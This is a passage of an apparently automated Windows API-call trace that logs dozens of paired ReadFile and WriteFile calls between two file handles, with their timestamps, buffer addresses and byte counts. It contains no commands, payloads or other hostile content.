nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.268] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.268] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.269] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.269] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.270] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.270] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.271] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.271] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.272] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.272] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.273] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.273] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.274] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.274] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.275] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.275] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.276] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.276] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.277] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.277] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.278] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.278] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.279] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.284] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.287] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.287] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.300] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.301] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x323, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.304] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.305] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.306] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.307] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, 